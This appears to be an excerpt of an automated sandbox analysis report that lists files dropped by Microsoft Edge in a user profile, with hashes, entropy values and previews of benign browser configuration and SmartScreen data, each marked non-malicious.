                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF390b8.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44170
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0905293170759895
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4ktCLmZtxtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynjtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:172CA269327D025CFEF762207219D2CA
                                                                                                                                                                                                                                                                                                                  SHA1:B1C083180A984AD1188AD033F14C405DE5842CE1
                                                                                                                                                                                                                                                                                                                  SHA-256:F6E78CBF693CAD0EB08938C6700C8958BAA254F6C77A7B1558C5BF9846899800
                                                                                                                                                                                                                                                                                                                  SHA-512:FE3FC566E75C959A17F132DD97AB5857C9D931C7DDFA7C98128A1388635D9CB61304F79A1C0074F75184264C9F14743FC362943FE798EC3E5C07D4939C0768BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:uriCache_

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.007961155602465
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXSxwvY:YWLSGTt1o9LuLgfGBPAzkVj/T8lCGA
                                                                                                                                                                                                                                                                                                                  MD5:334A0A4675DC6D863736C1A3A6F1D9EC
                                                                                                                                                                                                                                                                                                                  SHA1:383D7A18F5438ABABF666E121AB9EBBF631503F0
                                                                                                                                                                                                                                                                                                                  SHA-256:D1D9453426A502A1A41AA81320AD9F6C18DD8FA8FEA0D34AB42D46C07788D04B
                                                                                                                                                                                                                                                                                                                  SHA-512:FA7A136542045DB3BFDBF22C08B09D032694E752F55173109E29AE50B56C29C57D827D72953F89074382311116D583FDF108D95BF97D360E95044634E8C8917A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732301315430547}]}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                                  MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                                  SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                                  SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                                  SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a6e46ac1-d7fe-4d65-b94e-d111f73fcbd8.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44641
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.095733887872189
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kL/LmZikZSwucDPb38JKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynUZEKoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:FDE831B66FCEC5E35605AAABC3BAF6E2
                                                                                                                                                                                                                                                                                                                  SHA1:8A5525F9F32358928242C4DCE0AE70F2AFA6D5E6
                                                                                                                                                                                                                                                                                                                  SHA-256:F4498C49327F153120A9950E1A86A37A8DCD020E19C0D2875D6A5A73091D02C7
                                                                                                                                                                                                                                                                                                                  SHA-512:DCEDD64C95F37DA9B78382B012481106D6E6C3D43C45B0ACF5D84719B2C9D60730E3E0D1F2CFE658DAE5A28142500EBDC7DE3AB38CCEF006984BF75A83C7480C
                                                                                                                                                                                                                                                                                                                  Malicious:false
